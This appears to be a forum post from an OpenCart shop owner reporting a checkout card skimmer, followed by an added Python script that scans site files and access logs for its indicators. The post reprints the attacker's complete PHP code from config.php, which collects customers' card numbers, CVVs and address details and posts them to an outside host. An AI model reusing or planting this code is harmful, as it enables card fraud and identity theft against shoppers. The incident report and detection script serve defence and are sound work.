The hacker added a fake payment section to checkout Step 5 to defraud users of their card payment details.
Please see attached screenshot of the spoof payment fields they inserted.
The following files were first modified to allow file uploads:
\admin\language\en-gb\extension\keysubmit.php
\admin\language\en-gb\extension\headermenu.php
\admin\language\en-gb\extension\extension\feed.php
\admin\language\ru-ru\extension\module\sitemenu.php
Then the spoof HTML fields were added to both the default template and our custom template:
\catalog\view\theme\default\template\checkout\payment_method.twig
\catalog\view\theme\[our_custom_theme]\template\checkout\payment_method.twig
Then the following code was added to:
\config.php
```php
// Stage 1: the normal checkout address form posts a 'postcode' field;
// copy the customer's address details into the PHP session under
// obfuscated keys so they survive until the card form is submitted.
if (isset($_POST['postcode'])) {
    session_start();
    $_SESSION['adddreas'] = $_POST["address_1"];
    $_SESSION['addrebs'] = $_POST["city"];
    $_SESSION['sadsdws'] = $_POST["postcode"];
    $_SESSION['adsdSws'] = $_POST["firstname"];
    $_SESSION['adsdEWQWEws'] = $_POST["lastname"];
    $_SESSION['adsdEWQWEwse'] = $_POST["email"];
    $_SESSION['adsdEWQWEwst'] = $_POST["telephone"];
}
// Logged-in customers pick a saved address instead, so fetch it from
// oc_address using the store's own DB credentials (address_id is put
// into the query unescaped).
elseif (isset($_POST['address_id'])) {
    session_start();
    $link = mysqli_connect(DB_HOSTNAME, DB_USERNAME, DB_PASSWORD, DB_DATABASE);
    $youth = $_POST['address_id'];
    $sql = "SELECT * FROM oc_address WHERE address_id='$youth'";
    if ($res = mysqli_query($link, $sql)) {
        if (mysqli_num_rows($res) > 0) {
            while ($row = mysqli_fetch_array($res)) {
                $_SESSION['adddreas'] = $row["address_1"];
                $_SESSION['addrebs'] = $row["city"];
                $_SESSION['sadsdws'] = $row["postcode"];
                $_SESSION['adsdSws'] = $row["firstname"];
                $_SESSION['adsdEWQWEws'] = $row["lastname"];
            }
        }
    }
}
// Stage 2: the fake card fields injected into payment_method.twig post
// ccc/expp/cvvv. Join them with the stored address into one pipe-delimited
// record and POST it to the attacker's server, tagged with the shop's
// hostname ($ip is SERVER_NAME, not an IP address).
if (isset($_POST['ccc'])) {
    session_start();
    $ccnum = $_POST['ccc'];
    $expmonth = $_POST['expp'];
    $cvv = $_POST['cvvv'];
    $street = $_SESSION['adddreas'];
    $postcode = $_SESSION['sadsdws'];
    $city = $_SESSION['addrebs'];
    $fnamezz = $_SESSION['adsdEWQWEws'];
    $fnamez = $_SESSION['adsdSws'];
    $email = $_SESSION['adsdEWQWEwse'];
    $phone = $_SESSION['adsdEWQWEwst'];
    $ip = $_SERVER['SERVER_NAME'];
    $message = "$fnamez $fnamezz|$ccnum|$expmonth|$cvv|$street|$city|$postcode|$phone|$email";
    $rnessage = "$message\n";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://shiksd.xyz/plugins/");
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, "data=$rnessage&name=$ip");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $server_output = curl_exec($ch);
    curl_close($ch);
}
```
We have now fixed the site by restoring the hacked files from our original backup, and have also done a full compare of all site files to check that no other files were affected. All passwords have been changed, and the database credentials updated.
Questions:
1. Has anyone else seen a sophisticated hack like this?
2. Is there any way to find out how they managed to inject the original code?
3. Are there any security plugins that prevent code from being edited?
4. Are there any known vulnerabilities with the mods / extensions we are using?
Opencart: 3.0.3.8
Extensions / Modules:
PayPal Checkout Integration (Highly Recommended)
Worldpay Business Gateway
CouponAtCheckout (by cartbinder)
Extra Product Pages
Mega Filter PRO
Low Stock Management
Manufacturer List
Price Based Shipping
Redirect Manager
Restrict Payment Methods
Smart Search
TMD Import Export Module
Automatically generate SEO URL slug
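The post above is a complete description of a server-side card skimmer: a PHP upload backdoor dropped into files under admin/language, a fake card form in payment_method.twig, and an exfiltration stub appended to config.php. The following triage script is an added example (it is not the poster's code and not part of OpenCart) that turns the indicators quoted in the post into checks you can run against a copy of the site tree and its web-server access log. It assumes the exfil host shiksd.xyz, the ccc/expp/cvvv field names and the four dropped-file paths exactly as given in the post, and an access log in the common/combined format; the sample file bodies and log lines embedded in it are constructed for the demo.

```python
"""Triage script for the OpenCart card skimmer described in the post.

Added example, not the poster's code and not OpenCart code. Checks:
  * PHP files that reference the exfil host, read the fake card fields,
    call curl, or contain an upload/eval primitive;
  * files under admin/language that hold anything but $_['k'] = 'v'; lines
    (the attacker's upload backdoor lived in four such files);
  * checkout/payment_method.twig templates carrying card input fields;
  * access-log hits on the dropped files: the first POST to one of them is
    the latest moment the attacker had write access, so the log just before
    it is where to look for the initial entry (question 2 in the post).
Sample file bodies and log lines below are constructed for the demo.
"""
from __future__ import annotations

import re
import tempfile
from pathlib import Path
from typing import Iterable

EXFIL_HOST = "shiksd.xyz"              # from the curl_setopt(CURLOPT_URL, ...) line
CARD_FIELDS = ("ccc", "expp", "cvvv")  # POST names read by the skimmer

SUSPICIOUS = {
    "exfil host": re.compile(re.escape(EXFIL_HOST)),
    "card POST fields": re.compile(r"\$_POST\s*\[\s*['\"](?:%s)['\"]\s*\]" % "|".join(CARD_FIELDS)),
    "outbound curl": re.compile(r"\bcurl_init\s*\("),
    "upload/write primitive": re.compile(r"\b(?:move_uploaded_file|file_put_contents|eval|base64_decode)\s*\("),
}
# Heuristic: a clean OpenCart language file is only <?php, comments, blank
# lines and $_['key'] = 'value'; assignments. Multi-line string values would
# trip it, so a hit means "open this file", not proof of compromise.
LANG_OK = re.compile(r"^\s*(?:<\?php|//.*|#.*|\$_\[[^\]]*\]\s*=.*;|)\s*$")
# Common/combined log format: ip ident user [ts] "METHOD path proto" status ...
LOG_RX = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
# The four files the post says were modified to allow uploads.
DROPPED = (
    "admin/language/en-gb/extension/keysubmit.php",
    "admin/language/en-gb/extension/headermenu.php",
    "admin/language/en-gb/extension/extension/feed.php",
    "admin/language/ru-ru/extension/module/sitemenu.php",
)


def find_indicators(source: str) -> list[str]:
    """Names of SUSPICIOUS patterns present in a PHP source string."""
    return [name for name, rx in SUSPICIOUS.items() if rx.search(source)]


def language_file_is_clean(source: str) -> bool:
    """True if every line looks like a plain language-string assignment."""
    return all(LANG_OK.match(line) for line in source.splitlines())


def scan_install(root: Path) -> dict[str, list[str]]:
    """Walk an OpenCart tree; map relative path -> findings for files worth a look."""
    findings: dict[str, list[str]] = {}
    for path in root.rglob("*.php"):
        src = path.read_text(errors="replace")
        hits = find_indicators(src)
        rel = path.relative_to(root)
        if "language" in rel.parts and not language_file_is_clean(src):
            hits.append("code in a language file")
        if hits:
            findings[rel.as_posix()] = hits
    for path in root.rglob("payment_method.twig"):  # the fake form is in the template, not PHP
        names = re.findall(r"name\s*=\s*['\"](\w+)['\"]", path.read_text(errors="replace"))
        if any(n in CARD_FIELDS for n in names):
            findings[path.relative_to(root).as_posix()] = ["card input fields in template"]
    return findings


def requests_to_dropped_files(log_lines: Iterable[str], dropped: Iterable[str]) -> list[dict]:
    """Access-log entries whose request path is one of the attacker's files, in log order."""
    wanted = tuple(d.lstrip("/") for d in dropped)
    out = []
    for line in log_lines:
        m = LOG_RX.match(line)
        if m and m.group("path").lstrip("/").split("?")[0].endswith(wanted):
            out.append({k: m.group(k) for k in ("ip", "ts", "method", "path", "status")})
    return out


# Constructed demo data (mirrors the post's config.php snippet, one clean and
# one backdoored language file, the fake card input, and four log lines).
SAMPLE_CONFIG = r"""<?php
define('DB_HOSTNAME', 'localhost');
if (isset($_POST['ccc'])) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://shiksd.xyz/plugins/");
}
"""
SAMPLE_LANG_CLEAN = "<?php\n// Heading\n$_['heading_title'] = 'Feed';\n"
SAMPLE_LANG_DIRTY = SAMPLE_LANG_CLEAN + "if (isset($_FILES['f'])) { move_uploaded_file($_FILES['f']['tmp_name'], $_POST['d']); }\n"
SAMPLE_TWIG = '<input type="text" name="ccc" placeholder="Card number">\n'
SAMPLE_LOG = """203.0.113.7 - - [10/Feb/2023:01:12:03 +0000] "GET /admin/index.php?route=common/login HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Feb/2023:01:12:41 +0000] "POST /admin/language/en-gb/extension/keysubmit.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Feb/2023:01:15:09 +0000] "GET /index.php?route=checkout/checkout HTTP/1.1" 200 40211 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Feb/2023:01:16:30 +0000] "GET /admin/language/en-gb/extension/keysubmit.php HTTP/1.1" 200 311 "-" "Mozilla/5.0"
"""


def demo() -> dict[str, list[str]]:
    """Build the constructed mini-install in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel, body in {
            "config.php": SAMPLE_CONFIG,
            "admin/language/en-gb/extension/feed.php": SAMPLE_LANG_CLEAN,
            "admin/language/en-gb/extension/keysubmit.php": SAMPLE_LANG_DIRTY,
            "catalog/view/theme/default/template/checkout/payment_method.twig": SAMPLE_TWIG,
        }.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text(body)
        return scan_install(root)


if __name__ == "__main__":
    for rel, hits in sorted(demo().items()):
        print(f"{rel}: {', '.join(hits)}")
    for hit in requests_to_dropped_files(SAMPLE_LOG.splitlines(), DROPPED):
        print("{ts} {ip} {method} {path} {status}".format(**hit))
```

Run it against a pristine OpenCart 3.0.3.8 download first to see what the language-file heuristic flags on clean code, then against the compromised copy; the difference is the list of files to read. For the log check, the IP and timestamp of the first POST to a dropped file narrow the access log to the requests that preceded it, which is where any admin login, extension endpoint or upload handler the attacker used will appear.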